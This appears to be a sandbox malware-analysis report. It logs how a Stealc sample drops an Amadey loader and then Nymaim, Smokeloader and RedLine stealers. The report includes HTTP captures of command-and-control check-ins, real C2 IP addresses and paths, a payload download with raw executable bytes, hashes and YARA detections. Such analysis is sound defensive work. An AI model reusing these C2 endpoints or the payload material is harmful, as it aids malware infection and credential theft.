                                                  Data Ascii: Xk;d4ga3Y}B1l@-bGSn@=_<N&C\:Iq|YnD/E6Wy`+\zB*O]"Ytw[B,f#,0,8=bck9(=w'A2*fzlXR ?rV@/Aa7=wdfQinf
                                                  Nov 28, 2024 13:10:59.943007946 CET220INData Raw: 7c a1 56 b7 36 c3 90 63 e9 fe cc 39 60 f8 27 18 3a 0c 6a 33 8a 61 89 dc eb 3a b1 6d 4c f2 8f 9b c8 b5 7a c8 94 43 0b f5 96 79 a2 3d bb 08 8d ba db 98 bb b2 3f 80 31 52 c8 54 67 f7 fb 0b 47 f9 af 29 63 a7 ca 68 65 94 c5 7d 81 5c a7 7f 66 83 01 d8
                                                  Data Ascii: |V6c9`':j3a:mLzCy=?1RTgG)che}\fnh<!FH|WfQ boz[k!BHx-!Q+U4*=nmtt#+)\?eN\Z66$iN!


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.849711185.215.113.206807732C:\Users\user\Desktop\file.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 28, 2024 13:11:03.519773960 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary=----BAKEBFBAKKFCBGDHDGHD
                                                  Host: 185.215.113.206
                                                  Content-Length: 272
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 2d 2d 0d 0a
                                                  Data Ascii: ------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BAKEBFBAKKFCBGDHDGHD--
                                                  Nov 28, 2024 13:11:05.353075981 CET203INHTTP/1.1 200 OK
                                                  Date: Thu, 28 Nov 2024 12:11:04 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 0
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.849714185.215.113.43804640C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 28, 2024 13:12:05.524621010 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Host: 185.215.113.43
                                                  Content-Length: 4
                                                  Cache-Control: no-cache
                                                  Data Raw: 73 74 3d 73
                                                  Data Ascii: st=s
                                                  Nov 28, 2024 13:12:06.964832067 CET219INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Thu, 28 Nov 2024 12:12:06 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Refresh: 0; url = Login.php
                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 1 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.849715185.215.113.43804640C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 28, 2024 13:12:08.595304966 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Host: 185.215.113.43
                                                  Content-Length: 156
                                                  Cache-Control: no-cache
                                                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 36 32 37 37 30 42 37 35 43 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB62770B75C82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                  Nov 28, 2024 13:12:10.002995968 CET964INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Thu, 28 Nov 2024 12:12:09 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Data Raw: 33 30 35 0d 0a 20 3c 63 3e 31 30 30 39 38 38 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 65 37 31 39 62 35 30 35 39 62 62 30 31 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 30 39 38 38 32 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 39 38 35 35 30 33 65 38 38 39 31 31 32 32 37 38 30 31 32 66 66 65 35 61 66 35 64 66 39 66 61 34 65 34 66 66 66 62 63 36 37 65 38 30 34 61 35 38 62 62 34 62 66 30 30 31 35 37 34 39 34 31 38 64 63 63 61 61 31 64 61 61 61 38 23 31 30 30 39 38 38 34 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 65 37 31 39 62 35 30 35 39 62 62 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 30 39 38 38 35 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 [TRUNCATED]
                                                  Data Ascii: 305 <c>1009881001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1009882001+++b5937c1a99d5f9985503e889112278012ffe5af5df9fa4e4fffbc67e804a58bb4bf0015749418dccaa1daaa8#1009884001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1009885001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1009886001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1009887001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1009888001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1009889001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc67e805545b01cf64d4a485a9592e100b7#<d>0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.84971631.41.244.11804640C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 28, 2024 13:12:10.131380081 CET62OUTGET /files/unique2/random.exe HTTP/1.1
                                                  Host: 31.41.244.11
                                                  Nov 28, 2024 13:12:11.521333933 CET1236INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Thu, 28 Nov 2024 12:12:11 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 2031104
                                                  Last-Modified: Thu, 28 Nov 2024 11:14:19 GMT
                                                  Connection: keep-alive
                                                  ETag: "6748508b-1efe00"
                                                  Accept-Ranges: bytes
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 d9 52 43 b2 b8 3c 10 b2 b8 3c 10 b2 b8 3c 10 ac ea b8 10 ac b8 3c 10 ac ea a9 10 ad b8 3c 10 ac ea bf 10 cd b8 3c 10 95 7e 47 10 b1 b8 3c 10 b2 b8 3d 10 33 b8 3c 10 ac ea b6 10 b3 b8 3c 10 ac ea a8 10 b3 b8 3c 10 ac ea ad 10 b3 b8 3c 10 52 69 63 68 b2 b8 3c 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 18 5b c6 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 7c 05 00 00 ec 00 00 00 00 00 00 00 00 4c 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 4c 00 00 04 00 00 bd 35 1f 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$RC<<<<<<~G<=3<<<<Rich<PEL[d|L@0L5[o`8K P@.rsrc8`<@.idata @ *@dfoyrrjq1@vzxhknimK@.taggant0L"@
                                                  Nov 28, 2024 13:12:11.521394014 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 28, 2024 13:12:11.521404028 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 28, 2024 13:12:11.521445990 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 28, 2024 13:12:11.521460056 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 28, 2024 13:12:11.521547079 CET672INData Raw: 02 6d 93 f0 81 ee 28 f2 32 8a 04 f8 83 78 b0 c6 d7 bf 75 d1 e1 7d fb 14 f7 62 41 83 ac 3d 17 04 10 c6 bf a7 39 cf 92 a7 e2 61 ec 36 61 62 4a e8 2c ea 1a 9f 15 3e b5 87 f5 03 6e b8 e2 7b ec ab f8 18 fe 50 9f 7c 42 68 fc 66 4a 1b 9b 24 06 fa c6 21
                                                  Data Ascii: m(2xu}bA=9a6abJ,>n{P|BhfJ$!8*xu1QZw]\hZuq@UalxXdHyG"USb7ffQ_D98;T.l<HP_6\<_eO T[u2z$_s-
                                                  Nov 28, 2024 13:12:11.521559000 CET1236INData Raw: dc d6 8a 4e 28 4d 66 d8 ed 0f 5b aa ae 90 9b 52 93 c9 43 b3 f4 d4 68 ce ee 32 e2 2f 27 4f 81 93 15 15 69 1e 26 48 84 78 2d b9 eb 94 79 63 98 03 d4 c1 98 af af c4 8f 31 b7 04 2d fd c6 a8 8a 51 d7 94 ec f0 f2 11 9a 8e a8 62 a6 9f eb 73 3b 0c 57 bf
                                                  Data Ascii: N(Mf[RCh2/'Oi&Hx-yc1-Qbs;WJX[u;Iq9LiK`PfnJD\'OL0 2qIc&frb\kccxI`@w"Vgtr/,L\kDp\-qJ?l`u^/
                                                  Nov 28, 2024 13:12:11.521569014 CET1236INData Raw: 3b 44 4a dd f7 86 cd 5b e0 6e a1 55 b0 65 df 97 27 14 e9 53 92 ca 48 99 79 d5 40 3f 1d e9 bf 1f df 64 40 bf 0d d4 fb 83 a9 51 2c b8 38 8c 6d 1c fc 4c 40 3d 60 54 9e 66 a9 6e 14 c2 e5 69 f8 9d a2 5c a0 0d 73 54 da 73 da 46 26 6d e5 55 ab 9b a7 0f
                                                  Data Ascii: ;DJ[nUe'SHy@?d@Q,8mL@=`Tfni\sTsF&mUo\}?#3H]ru[ yPPWT\ nE2)Zix_L9#VmL0TrYnT!o_sbZ+[6iya0VIA
                                                  Nov 28, 2024 13:12:11.521662951 CET448INData Raw: 23 86 12 dc 14 d6 42 89 1f a5 17 2c 44 14 8a b3 c7 42 68 5c 40 aa fd 35 b0 28 17 94 27 34 e9 13 e4 b1 48 9c bc 6c 40 d4 eb 4a b3 1f df 64 08 c4 49 d3 20 08 93 65 a1 58 1a 94 80 b3 23 98 f3 4a 5f 79 71 df 72 7b ab ca e5 44 08 1e 83 d7 7c 5c d6 c0
                                                  Data Ascii: #B,DBh\@5('4Hl@JdI eX#J_yqr{D|\SBL'Hft@$hTPwV"}Px$iRL_S~bs;T_Hji@@PKXH:rGpL@EImG@?dQAeXa_'"Ehc^W[?3d!A+[]P
                                                  Nov 28, 2024 13:12:11.521673918 CET1236INData Raw: 6f bf 4c 6d 42 57 f2 e6 c1 b4 50 87 0f 14 e8 9c a1 71 85 d4 20 8a 54 8e 21 4f 5a 1c 06 30 c8 8b 4f ab 66 01 3d 56 2e 1c 81 4c ff ab 9f 3c 09 5e ce 99 57 6e 53 19 b9 9b ab 64 a8 64 ca be 66 a0 ad 48 d9 d8 9b 32 e8 b3 3b 3c 88 ca 3c 52 3d 30 17 3e
                                                  Data Ascii: oLmBWPq T!OZ0Of=V.L<^WnSddfH2;<<R=0>Es]"3:\p^l<R_{PE1#F[I2y? h\\@l+*kBK(twAR,lD]4PKqP_MD@|%?XH,\
                                                  Nov 28, 2024 13:12:11.641518116 CET1236INData Raw: a0 f0 a7 5c 30 39 4a 59 33 52 8a 5d 5b 73 4a 2c a1 56 9e 5b bd 52 00 b0 00 46 07 2c 51 55 d5 5c 46 64 79 5e ed 52 3e dc 2e 42 bf 5d a6 d4 c8 dc 21 d3 cc 20 5f de cf 23 28 da c3 27 2c 54 c6 2a 2f c5 da 2e 33 c1 48 31 36 cc d1 35 3a c8 d5 5b 3c f7
                                                  Data Ascii: \09JY3R][sJ,V[RF,QU\Fdy^R>.B]! _#(',T*/.3H165:[<(=,_/#T&:H15\aa_dhhlTkoosHqvvz\|h}AlA_oDHcHLTfKOzOSHQVqVZu]W|q_|T0n5`s;hGx$Kcg


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:1
                                                  Start time:07:10:11
                                                  Start date:28/11/2024
                                                  Path:C:\Users\user\Desktop\file.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                  Imagebase:0x650000
                                                  File size:1'802'240 bytes
                                                  MD5 hash:45A44E016967A33A277601951D2B5E0D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1441862159.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1955784660.0000000000651000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1957372627.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:07:11:02
                                                  Start date:28/11/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsIIEBGIDAAF.exe"
                                                  Imagebase:0xa40000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:07:11:02
                                                  Start date:28/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:07:11:03
                                                  Start date:28/11/2024
                                                  Path:C:\Users\user\DocumentsIIEBGIDAAF.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\DocumentsIIEBGIDAAF.exe"
                                                  Imagebase:0xe00000
                                                  File size:1'906'176 bytes
                                                  MD5 hash:9E221BE6B28A24EC318E27C499DA8C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.1994320392.0000000000E01000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.1951715692.0000000005170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:07:11:05
                                                  Start date:28/11/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                  Imagebase:0xe0000
                                                  File size:1'906'176 bytes
                                                  MD5 hash:9E221BE6B28A24EC318E27C499DA8C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.2025296435.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.1984502664.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:07:11:06
                                                  Start date:28/11/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  Imagebase:0xe0000
                                                  File size:1'906'176 bytes
                                                  MD5 hash:9E221BE6B28A24EC318E27C499DA8C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.1997212194.0000000004880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.2037671976.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:07:12:00
                                                  Start date:28/11/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  Imagebase:0xe0000
                                                  File size:1'906'176 bytes
                                                  MD5 hash:9E221BE6B28A24EC318E27C499DA8C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000003.2525179171.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:14
                                                  Start time:07:12:15
                                                  Start date:28/11/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe"
                                                  Imagebase:0x400000
                                                  File size:2'031'104 bytes
                                                  MD5 hash:B2D9E9B305C92045DFDF886CF0287182
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.2675534930.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 0000000E.00000003.2669859529.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 29%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  Reset < >
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.1998822145.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5370000_DocumentsIIEBGIDAAF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d0feecef74f3230965421da06757abfb5d2b8f964b35c700eefb163cc110e767
                                                    • Instruction ID: 531a99e410bb7a40c4550bf45c325f9fc80f353ebeeab2ac35a5c474f034da17
                                                    • Opcode Fuzzy Hash: d0feecef74f3230965421da06757abfb5d2b8f964b35c700eefb163cc110e767
                                                    • Instruction Fuzzy Hash: 5A01D1EBA0E11DBE31AAC1412B18AB7276FE5CBA307308427F407D7E41E1AC4D865D31
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.1998822145.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5370000_DocumentsIIEBGIDAAF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e339c258fbb3ffc4a2aeb3bc527b3c6fd1b30272253366ada62627a6fe25ed90
                                                    • Instruction ID: 43b58853743e2d10bace066e6d570e1e50ddf99db7cdaf7e84d9e22d11cfe40c
                                                    • Opcode Fuzzy Hash: e339c258fbb3ffc4a2aeb3bc527b3c6fd1b30272253366ada62627a6fe25ed90
                                                    • Instruction Fuzzy Hash: E41157E794E109BEB296C2656658AF62B6FD9C763033044A7F047CBA12E1584C829E20
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.1998822145.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5370000_DocumentsIIEBGIDAAF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 57a6536a95f85fc5422891fb0d176c3625d9b5313bb0e18cf073eaa61dd79746
                                                    • Instruction ID: 183df07f8012d32ef2107e2c01c1f6cadfb562f7f03635be52bcdbbfe13b7728
                                                    • Opcode Fuzzy Hash: 57a6536a95f85fc5422891fb0d176c3625d9b5313bb0e18cf073eaa61dd79746
                                                    • Instruction Fuzzy Hash: 521189A7E0E69CBEF357CB6066485F63F6FD98723473088A3F043CA912D55949468A30
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.1998822145.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5370000_DocumentsIIEBGIDAAF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ef0c644f8d89519d676c5c6bcec1c3bdbd1a23ab9cb1b96e966eeea2d17003f
                                                    • Instruction ID: a0e8872b2c1e5c314e8760a0d7f56821795c77c5648426f0e8899cd1e7b2a579
                                                    • Opcode Fuzzy Hash: 5ef0c644f8d89519d676c5c6bcec1c3bdbd1a23ab9cb1b96e966eeea2d17003f
                                                    • Instruction Fuzzy Hash: 5F0126B7A0E219EFA2A5D555660CAFA336FE6C7230730C42AF003C7901E6AC49465930
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.1998822145.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5370000_DocumentsIIEBGIDAAF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d0b5bad8c74fe32b13616d878fce570617da27e749018c9ced4a73044c7a4d2
                                                    • Instruction ID: b2d70b07e46636d94e79147f09b526e0c56cc27abb7c4debcfc7877a017c3a1d
                                                    • Opcode Fuzzy Hash: 2d0b5bad8c74fe32b13616d878fce570617da27e749018c9ced4a73044c7a4d2
                                                    • Instruction Fuzzy Hash: DC0120A3D4D50DADE396C7109A449F5277EF6C1624B258467E042CA942E25D49064631
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.1998822145.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5370000_DocumentsIIEBGIDAAF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 730f0c29b541a06614b6d3e42845352f2ae8964ab43a7fe70b694226e627df9f
                                                    • Instruction ID: 30865544718ff29722809a9b226d6e7e448444da4bfade64eb2c0bea69ba830f
                                                    • Opcode Fuzzy Hash: 730f0c29b541a06614b6d3e42845352f2ae8964ab43a7fe70b694226e627df9f
